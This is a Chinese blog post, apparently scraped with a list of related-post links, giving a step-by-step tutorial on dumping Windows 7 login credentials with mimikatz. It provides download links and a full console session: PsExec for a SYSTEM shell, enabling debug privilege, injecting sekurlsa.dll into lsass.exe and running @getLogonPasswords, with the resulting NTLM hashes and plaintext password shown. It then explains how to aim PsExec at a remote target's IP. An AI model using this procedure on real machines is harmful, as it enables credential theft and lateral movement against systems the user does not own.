mimikatz下载地址:

http://www.webshell.cc/wp-content/uploads/2012/02/mimikatz_trunk.zip

http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip

blog.gentilkiwi.com应该是法国佬的博客。

用mimikatz来获取win7的密码:

Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。C:\Users\Administrator>cd C:\mimikatz_trunk\toolsC:\mimikatz_trunk\tools>PsExec.exe \\127.0.0.1 cmd.exePsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.comMicrosoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。C:\Windows\system32>cd C:\mimikatz_trunk\Win32C:\mimikatz_trunk\Win32>mimikatz.exe mimikatz.exe
mimikatz 1.0 x86 (alpha)        /* Traitement du Kiwi (Feb  9 2012 01:46:57) */
// http://blog.gentilkiwi.com/mimikatzmimikatz # privilege::debug
Demande d'ACTIVATION du privil猫ge : SeDebugPrivilege : OKmimikatz # inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
PROCESSENTRY32(lsass.exe).th32ProcessID = 488
Attente de connexion du client...
Serveur connect茅 脿 un client !
Message du processus :
Bienvenue dans un processus distantGentil KiwiSekurLSA : librairie de manipulation des donn茅es de s茅curit茅s dans LSASSmimikatz # @getLogonPasswordsAuthentification Id         : 0;395889
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : WIN-S1J6267VPKLmsv1_0 :        lm{ 7f6dc700e15e9f92aad3b435b51404ee }, ntlm{ 70829646e7
0fc9f291f87a41b9e158c5 }wdigest :       yangtspkg :         yangAuthentification Id         : 0;155584
Package d'authentification  : NTLM
Utilisateur principal       : ANONYMOUS LOGON
Domaine d'authentification  : NT AUTHORITYmsv1_0 :        n.t. (LUID KO)wdigest :       n.t. (LUID KO)tspkg :         n.t. (LUID KO)Authentification Id         : 0;75419
Package d'authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d'authentification  : WIN-S1J6267VPKLmsv1_0 :        lm{ 7f6dc700e15e9f92aad3b435b51404ee }, ntlm{ 70829646e7
0fc9f291f87a41b9e158c5 }wdigest :       yangtspkg :         yangAuthentification Id         : 0;997
Package d'authentification  : Negotiate
Utilisateur principal       : LOCAL SERVICE
Domaine d'authentification  : NT AUTHORITYmsv1_0 :        n.t. (LUID KO)wdigest :tspkg :         n.t. (LUID KO)Authentification Id         : 0;996
Package d'authentification  : Negotiate
Utilisateur principal       : WIN-S1J6267VPKL$
Domaine d'authentification  : WORKGROUPmsv1_0 :        n.t. (LUID KO)wdigest :tspkg :         n.t. (LUID KO)Authentification Id         : 0;40847
Package d'authentification  : NTLM
Utilisateur principal       :
Domaine d'authentification  :msv1_0 :        n.t. (LUID KO)wdigest :       n.t. (LUID KO)tspkg :         n.t. (LUID KO)Authentification Id         : 0;999
Package d'authentification  : NTLM
Utilisateur principal       : WIN-S1J6267VPKL$
Domaine d'authentification  : WORKGROUPmsv1_0 :        n.t. (LUID KO)wdigest :tspkg :         n.t. (LUID KO)mimikatz # exit
Fermeture du canal de communicationC:\mimikatz_trunk\Win32>

wdigest后面的就是密码。如上所示,我的win7的Administrator的密码是yang。

工具的作者的blog:http://blog.gentilkiwi.com/mimikatz

解释:

privilege::debug  //提升权限

inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"   //注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)!

@getLogonPasswords  //抓取密码

exit  //退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环

另外,我测试的时候,是在win7上测试的。还可以在XP上来连接win7,只需要修改一下IP,例如:

PsExec.exe \\192.168.1.123 cmd.exe

把上面的192.168.1.123改为目标的IP。

用mimikatz来获取win7的密码相关推荐

  1. 【问题记录】防止mimikatz获取到明文密码

    1. 打补丁KB2871997 2. 禁用Wdigest Auth 3. 删除用户凭证 搭靶机的时候想弄个通过哈希传递攻击的机器,但是上传mimikatz之后发现可以直接抓取到明文密码.主要是wdig ...

  2. mimakatz用法_两步完成利用procdump64+mimikatz获取win用户密码

    使用procdump64+mimikatz可实现从内存中获取明文密码 工具 链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38 首先得 ...

  3. 获取Windows系统密码凭证 (゚益゚メ) 渗透测试

    文章目录 Windows 加密简介 Windows 哈希过程 Windows 凭证获取 使用powershell脚本 Pwddump7 使用猕猴桃(mimikatz) 常用命令 本地非交互式凭证获取 ...

  4. 内网渗透之mimikatz+procdump 提取 Windows 明文密码

    0x00 原理 获取到内存文件 lsass.exe 进程 (它用于本地安全和登陆策略) 中存储的明文登录密码. 0x01 操作 Windows10/2012 以下的版本: 1.上传 procdump ...

  5. 修改服务器win7密码忘记,远程服务器win7改密码

    远程服务器win7改密码 内容精选 换一换 代码迁移工具进行代码迁移时,需要调用Linux下的rpm.deb等命令才能完成扫描和迁移相关任务,这些命令和逻辑必须在后端Linux运行.插件只支持以Web ...

  6. 5.2.2 利用arp中间人攻击获取管理员账号密码

    一.arp协议简述: ARP即地址解析协议,用于IP地址到MAC地址的映射,即由目标IP找到对应的MAC地址.ARP协议特点是"广播请求,单播回应". 二.arp欺骗原理:(看图, ...

  7. Win7开机密码破解

    (只是为了遇到同样问题的朋友提供帮助,不要做有损于他人的事情!资料来自网络!) 方法一: 1. 进入pe 2.进入c:\windows\system32下 更改magnify.exe和cmd.exe的 ...

  8. sqlmap 获取mysql密码_利用sqlmap 获取管理员账号密码

    首先,先简单介绍下sqlmap 简介: sqlmap是一种开源的 支持的数据库:MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Ac ...

  9. 发现一个工具,可以清除 xp win7 用户密码,在PE下运行

    发现一个工具,可以清除 xp win7 用户密码,在PE下运行 原版,不是这个,现在都是汉化版,加几个字. 真正的原版,早在几年前就有了.我不记得了. 以前没有这个习惯,写技术日记,记录下来. 现在开 ...

最新文章

  1. anaconda创建菜单失败
  2. ARP探测目标工具arping常用命令集合大学霸IT达人
  3. Prototype1.5.1源代码解读分析-1
  4. 程序员面试题精选100题(01)-把二元查找树转变成排序的双向链表[数据结构]
  5. Linux文件基本操作管理
  6. 2.3 KNN-采用机器学习库来预测鸢尾花的分类
  7. PyTorch1.0 教程 例子和书籍
  8. springsession分布式登录被覆盖_拉勾 分布式 学习小结
  9. 利用CloudIDE当做简单linux环境,执行简单python工程任务
  10. java 线程栈大小配置,JVM运行时数据区详解-Stack栈(优化配置、代码样例)
  11. 利用ggseqlogo绘制seqlogo图
  12. java考勤表导出_考勤表如何导出?
  13. ofo启示 | 创业企业为何大多熬不过五年?
  14. convertTo函数的用法
  15. 使用高德开放平台显示指定的坐标点和线
  16. Ubuntu虚拟机安装
  17. 在单机(物理机)上用虚拟机部署kubernetes集群
  18. 《深入理解Java虚拟机》第 3 版里面到底多了哪些知识点?本文竟然得到了本书作者的认可!
  19. 微前端架构实现(项目引入,消息总线,构建部署,监听服务)
  20. Matlab/Simulink中PMSM模型的反电动势系数和转矩系数

热门文章

  1. 信息系统项目管理师教程读书笔记(三)
  2. 3000xp7.32突然显示主数据库不存在的解决一例
  3. 冷原子量子计算机,量子计算新突破:在71个格点超冷原子量子模拟器中求解施温格方程...
  4. VirtuaNES.v0.97源码探究7 NES文件格式
  5. 30多个最受用的基于XML的Flash相册教程 -- Part II
  6. css3鼠标移出,CSS3:hover后鼠标移出animation
  7. 【iOS】对于iPhone5分辨率兼容性调整有关问题
  8. 眼镜计算机检查,每次拿到验光单都傻傻看不清楚?教你一分钟看明白
  9. 暗黑三的一些你需要注意的事情
  10. pandas用众数填充缺失值_数据处理之缺失值填充